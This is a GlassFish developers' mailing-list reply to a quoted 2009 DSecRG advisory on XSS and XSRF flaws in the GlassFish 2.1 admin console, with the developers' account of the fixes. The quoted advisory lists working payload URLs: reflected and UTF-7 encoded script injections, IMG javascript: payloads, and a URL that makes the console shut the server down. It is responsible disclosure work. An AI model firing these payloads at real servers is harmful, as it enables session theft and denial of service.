Hi Everyone,
I'd like to thank The Digital Security Research Group for bringing the
issues listed below to our attention. We immediately began investigating
and fixing this issues as soon as possible since security is very
important to the our community. We have fixes for all of the specific
issues reported, and found many other similar instances which we also
fixed. Here are some comments on our assessment of these issues:
The security risk reported in these issues is exploitable by someone
that emails a crafted link to an authenticated GlassFish admin user, or
finds some other way to trick the user into clicking a crafted link. The
crafted link will contain some code (often JS) that may collect and send
information to the attacker. None of the reported attacks can be
directly executed by the attacker, the victim must click on a malicious
URL while being logged into the Admin console. The chance of a
successful attack for these issues is very small, even if targeting a
large pool of GlassFish admin users. Nonetheless, the threat is a real
security concern. As with any website or web application which may have
private information, it is advisable that you log out when you are no
longer using the console which will avoid these types of attacks.
There are 3 types of security issues reported: 1.1, 1.2, and 1.3.
Reported Issue #2 is technically identical to issue 1.1, except that it
is a specific example of how to exploit it -- so I did not list it as a
4th type of issue.
1.1:
I have not found any current real-world browsers that make the 1.1
exploit possible (however, I only tried FF 3, IE 6, and Safari -- older
browsers such as Netscape 2/3 are likely to be vulnerable).
Nevertheless, issue 1.1 has been fixed (this includes the original issue
2 scenario).
1.2:
Issue 1.2 is not related to the GlassFish admin console code directly,
it is regarding the handling of 404 error page by "ThemeServlet" in
project Woodstock. In Woodstock code, when sending a 404 page, they
quote back the request URI in their response - this is a problem. I have
changed their code to NOT do this, so this issue is fixed. I evaluated
all other cases where we throw 404 error messages including our use of
JSFTemplating, jMaki, other Woodstock cases, Shale, our DownloadServlet,
and JavaServer Faces -- none of these present this same issue. Jan
confirmed that the GlassFish web container handles this properly as well
and does not present a risk.
1.3:
Issue 1.3 fix exists in a number of files and was the easiest to
exploit. We have gone over every file and have made a fix in the
GlassFish code-base which solves this issue in all known cases.
Thanks again for bringing these issue to our attention and helping make
the GlassFish Admin Console a more secure tool for all GlassFish users.
Thanks!
Ken Paulsen & Anissa Lam
GlassFish Developers from the Admin Console Team
DSecRG wrote:
> Hello,We are security researchers from Digital Security company
> [http://dsecrg.com].
> We found a critical vulnerability in your system Sun Glassfish Enterprise Server
>
> This advisory is being provided to you under the policy documented at
> http://dsecrg.com/files/DSPolicy_en.pdf. We recommend you to read this policy; however, in the interim, you have 7 days to respond to this initial email. This policy encourages open communication, and we forward to working with you on resolving the problem detailed below.
>
>
>
> Digital Security Research Group [DSecRG] Advisory #DSECRG-09-0
>
>
> Application: Sun Glassfish Enterprise Server
> Versions Affected: 2.1
> Vendor URL: https://glassfish.dev.java.net/
> Bug: Multiple XSS and XSRF Vulnerabilities
> Exploits: YES
> Reported: 18.03.2009
> Vendor response: ..2009
> Solution: ..
> Date of Public Advisory: ..
> CVE-numbers: ..
> Author: Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)
>
>
>
> Description
> ***********
>
> 1. Glassfish Server Admin Console multiple XSS vulnerabilities.
> 2. Glassfish Server Admin Console shutdown server XSRF vulnerability.
>
>
>
> Details
> *******
>
> 1. Glassfish Server Admin Console multiple XSS vulnerabilities.
>
> Using this vulnerability attacker can steal admin's cookie and then
> authentificate as administrator or perform certain administrative
> actions.
>
> 1.1 Multiple Linked XSS vulnerabilities.
>
> Many pages have typical XSS vulnerability.
>
> Attacker can inject XSS in URL string.
>
> Example:
>
> http://[server]/applications/applications.jsf?');};alert("DSecRG_XSS");</script><!--
> http://[server]/configuration/configuration.jsf?');};alert("DSecRG_XSS");</script><!--
> http://[server]/customMBeans/customMBeans.jsf?');};alert("DSecRG_XSS");</script><!--
> http://[server]/resourceNode/resources.jsf?');};alert("DSecRG_XSS");</script><!--
> http://[server]/sysnet/registration.jsf?');};alert("DSecRG_XSS");</script><!--
> http://[server]/webService/webServicesGeneral.jsf?');};alert("DSecRG_XSS");</script><!--
>
> Response HTML Code:
> -------------------
> #################################################
>
> ...
> <script type="text/javascript">
> var myonload = new Object();
> myonload.oldonload = window.onload;
> myonload.newonload = function() {
> if ('/applications/applications.jsf?');};alert("DSecRG_XSS");</script><!--' != '') {
> ...
>
> #################################################
>
>
> 1.2 Multiple Linked XSS vulnerabilities in 404 Error page.
>
> Attacker can inject XSS in URL string using UTF-7 encoding.
>
> Exploiting this issue required Auto-Select encoding in browser
> configuration.
>
> Example:
>
> http://[server]/theme/META-INF/>+ACJ-+AD4APB-SCRIPT+AD7-alert(+ACI-DSecRG_XSS+ACI-)+ADz-/SCRIPT+AD7-
>
>
> 1.3 Multiple Linked XSS vulnerabilities in GET parameter "name".
>
> Many pages have typical XSS vulnerability in GET parameter "name".
>
> Attacker can inject XSS in URL string.
>
> Example:
>
> http://[server]/configuration/auditModuleEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>
> http://[server]/configuration/httpListenerEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>&configName=server-config
> http://[server]/resourceNode/jdbcResourceEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>
>
>
> ---------------------------------------------------------------------
>
>
> 2. Glassfish Server Admin Console shutdown server XSRF vulnerability.
>
> Exploiting this issue allow a remote attacker to shutdown server.
>
> Example:
>
> http://[server]/applications/applications.jsf?<script>document.location.href="http://[server]/shutdown.jsf";</script>
>
>
>
> About
> *****
>
> Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
>
>
> Contact: research [at] dsecrg [dot] com
> http://www.dsecrg.com
> http://www.dsec.ru
>
>
> Regards,
> Digital Security Research Group [DSecRG]
> ________________________________________
> DIGITAL SECURITY
> tel/fax: +7(812)703-1547
> tel: +7(812)430-9130
> e-mail: research_at_dsecrg.com
> web: www.dsecrg.com
> ----------------------------------------
> This message and any attachment are confidential and may be privileged
> or otherwise protected from disclosure. If you are not the intended
> recipient any use, distribution, copying or disclosure is strictly
> prohibited. If you have received this message in error, please notify
> the sender immediately either by telephone or by e-mail and delete this
> message and any attachment from your system. Correspondence via e-mail
> is for information purposes only. Digital Security neither makes nor
> accepts legally binding statements by e-mail unless otherwise agreed.
> ----------------------------------------
>
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: dev-unsubscribe_at_glassfish.dev.java.net
> For additional commands, e-mail: dev-help_at_glassfish.dev.java.net
>
>